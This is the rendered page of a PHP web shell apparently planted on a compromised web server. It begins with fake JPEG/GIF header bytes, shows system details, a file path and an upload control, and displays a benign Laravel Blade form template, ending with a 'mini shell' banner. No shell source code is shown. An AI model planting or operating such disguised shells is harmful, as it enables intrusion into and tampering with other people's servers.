ÿØÿà JFIF  H H ÿÛ C   GIF89; Eú tiket mi chék chéúfetál .

Eú tiket mi chék chéúfetál .

System: Linux srv913213 5.15.0-190-generic #200-Ubuntu SMP Fri Aug 7 15:06:04 UTC 2026 x86_64

Current Path : /var/www/yapwebtv.com/Modules_old/Api/Resources/views/
Upload File :
Current File : /var/www/yapwebtv.com/Modules_old/Api/Resources/views/edit_intro.blade.php

@extends('common::layouts.master')
@section('gallery-aria-expanded')
    aria-expanded="true"
@endsection
@section('gallery-show')
    show
@endsection
@section('gallery')
    active
@endsection
@section('app-intro')
    active
@endsection

@section('content')
    <div class="dashboard-ecommerce">
        <div class="container-fluid dashboard-content ">
            <!-- page info start-->
            <div class="row clearfix">
                <div class="col-12">
                    <div class="row">
                        <div class="col-12">
                            @if(session('error'))
                                <div id="error_m" class="alert alert-danger">
                                    {{session('error')}}
                                </div>
                            @endif
                            @if(session('success'))
                                <div id="success_m" class="alert alert-success">
                                    {{session('success')}}
                                </div>
                            @endif
                            @if ($errors->any())
                                <div class="alert alert-danger">
                                    <ul>
                                        @foreach ($errors->all() as $error)
                                            <li>{{ $error }}</li>
                                        @endforeach
                                    </ul>
                                </div>
                            @endif
                        </div>
                        <!-- Main Content section start -->
                        <div class="col-12 col-lg-8">
                            {{--                            {!!  Form::open(['route'=>'add-album-image','method' => 'post','enctype'='multipart/form-data']) !!}--}}
                            <form class="author-form" name="author-form" method="post"
                                  action="{{ route('update-intro') }}" enctype="multipart/form-data">
                                @csrf
                                <div class="add-new-page  bg-white p-20 m-b-20">
                                    <div class="add-new-header clearfix m-b-20">
                                        <div class="row">
                                            <div class="col-6">
                                                <div class="block-header">
                                                    <h2>{{ __('update_app_intro') }}</h2>
                                                </div>
                                            </div>
                                            @if(Sentinel::getUser()->hasAccess(['album_read']))
                                                <div class="col-6 text-right">
                                                    <a href="{{ route('app-intro') }}"
                                                       class="btn btn-primary btn-sm btn-add-new"><i
                                                            class="fa fa-bars"></i>
                                                        {{ __('back') }}
                                                    </a>
                                                </div>
                                            @endif
                                        </div>
                                    </div>

                                    <div class="col-sm-12">
                                        <div class="form-group">
                                            <label for="language">{{ __('select_language') }} *</label>
                                            <select class="form-control" id="language" name="language">
                                                @foreach ($activeLang as  $lang)
                                                    <option
                                                        @if(@$appIntro->language==$lang->code) Selected
                                                        @endif value="{{ $lang->code }}">{{ $lang->name }}
                                                    </option>
                                                @endforeach
                                            </select>
                                        </div>
                                    </div>
                                    <div class="col-sm-12">
                                        <div class="form-group">
                                            <label for="title" class="col-form-label">{{ __('title') }}
                                                *</label>
                                            <input id="title" name="title" type="text" value="{{ $appIntro->title }}" class="form-control"
                                                   required>
                                            <input id="intro_id" hidden name="intro_id" type="text" value="{{ $appIntro->id }}"
                                                   required>
                                        </div>
                                    </div>
                                    <div class="col-sm-12">
                                        <div class="form-group">
                                            <label for="description"
                                                   class="col-form-label">{{ __('description') }} *</label>
                                            <textarea id="description" class="form-control" rows="9" cols="9"
                                                      name="description">{{ $appIntro->description }}</textarea>
                                        </div>
                                    </div>
                                    <div class="col-sm-12">
                                        <div class="form-group">
                                            <div class="author">
                                                @if(isFileExist(@$appIntro, $result = @$appIntro->image))
                                                    <img
                                                        src=" {{basePath($appIntro)}}/{{ $result }} "
                                                        data-src="{{basePath($appIntro)}}/{{ $result }}" id="old-image"
                                                        width="200"  height="200" alt="image" class="img-responsive img-thumbnail lazyloaded">

                                                @else
                                                    <img src="{{static_asset('default-image/default-100x100.png') }} " width="200"
                                                         height="200" alt="image" id="old-image"
                                                         class="img-responsive img-thumbnail">
                                                @endif

                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-sm-12">
                                        <div class="field" align="left">

                                            <div class="form-group text-left mb-0">
                                                <input type="file" id="new-image" class="d-none " name="image">
                                                <label for="new-image" class="upload-file-btn btn btn-primary">{{__('change_image')}}</label>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="row">
                                        <div class="col-12 m-t-20">
                                            <div class="form-group form-float form-group-sm text-right">
                                                <button type="submit" name="btnsubmit" class="btn btn-primary"><i
                                                        class="m-r-10 mdi mdi-plus"></i>{{ __('update_image') }}</button>
                                            </div>
                                        </div>
                                    </div>

                                </div>
                            </form>
                            {{--                            {!! Form::close() !!}--}}
                        </div>
                        <!-- Main Content section end -->

                    </div>
                </div>
            </div>
            <!-- page info end-->
        </div>
    </div>
@section('script')

    <script>
        function readURL(input) {
            if (input.files && input.files[0]) {
                var reader = new FileReader();

                reader.onload = function (e) {
                    $('#old-image').attr('src', e.target.result);
                }

                reader.readAsDataURL(input.files[0]);
            }
        }

        $("#new-image").change(function(){
            readURL(this);
        });

    </script>
@endsection
@endsection

xxxxx1.0, XXX xxxx
SPECIMENT MINI SHELL - RECODED FROM PHANTOM GHOST